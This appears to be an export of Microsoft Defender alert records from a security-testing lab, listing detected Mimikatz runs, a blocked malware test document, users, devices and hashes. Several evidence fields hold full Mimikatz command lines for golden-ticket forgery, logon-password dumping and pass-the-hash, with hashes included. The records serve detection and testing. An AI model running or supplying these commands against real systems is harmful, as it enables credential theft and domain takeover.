"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:46.97Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv8.m365dpoc.com /sid:S-1-5-21-3093100532-1494214188-4059994775 /krbtgt:58c09f24a80803bb99a10fbe96570ebc /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-12-22T08:47:53.8460182Z",
"processId": 976,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:10:33.2433333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T09:07:41.4690585Z",
"parentProcessFileName": "powershell_ise.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5408,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv8.m365dpoc.com /sid:S-1-5-21-3093100532-1494214188-4059994775 /krbtgt:58c09f24a80803bb99a10fbe96570ebc /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-12-22T09:08:35.5742007Z",
"processId": 3136,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:10:33.41Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T09:07:41.4690585Z",
"parentProcessFileName": "powershell_ise.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5408,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv8.m365dpoc.com /sid:S-1-5-21-3093100532-1494214188-4059994775 /krbtgt:58c09f24a80803bb99a10fbe96570ebc /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-12-22T09:09:24.0954271Z",
"processId": 6872,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037709209819363_1615742554
|
1eb3d50c-478a-4958-995a-b7f02e752be3
| 707
|
MicrosoftDefenderForEndpoint
|
2022-11-11T13:42:00.9819553Z
|
2022-11-12T01:35:43.1133333Z
|
2022-11-12T01:35:42.9033333Z
|
2022-11-11T13:30:23.4062257Z
|
2022-11-11T13:30:23.4062257Z
|
'Donoff' malware was prevented
|
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Malware
|
Resolved
|
Informational
| 42
|
PartiallyRemediated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAv
|
d60f5b90-ecd8-4d77-8186-a801597ec762
|
takeshi@msdxv2.m365dpoc.com
| null |
Donoff
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-11-11T13:23:18.268Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "d358873e58e59dd581ae039d6adf230c0054adb0",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/TAKESHI/providers/Microsoft.Compute/virtualMachines/TAKESHI-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "49207903-d8c3-49f8-848f-f33c41525edb"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "d358873e58e59dd581ae039d6adf230c0054adb0",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T13:42:01.3333333Z",
"fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1",
"sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-16T02:16:47.2433333Z
|
Suspicious
|
None
|
svc_acct
| null |
S-1-12-1-2269820315-1261997569-3294602117-2733835123
|
874ab59b-8e01-4b38-85a3-5fc47303f3a2
|
msftadmin@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T13:27:33.96Z
|
Benign
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037515168785563_1551389985
|
ee941733-97a7-477b-9e4e-0b4e04a8465d
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:18:36.8785763Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:09.0417181Z
|
2022-11-11T08:17:09.0417181Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:18:37.01Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:18:37.01Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-11T08:17:06.3382251Z",
"processId": 6044,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T10:46:44.71Z
|
Suspicious
|
None
|
darol
|
rnd.local
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-21T02:27:36.8066667Z
|
Unknown
|
None
|
jeff
| null |
S-1-5-21-2300221942-1987151257-321556088-1104
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
| 10,944
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
|
2022-11-21T02:13:46.7172682Z
| 11,068
|
2022-11-21T02:01:28.4753286Z
| null | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.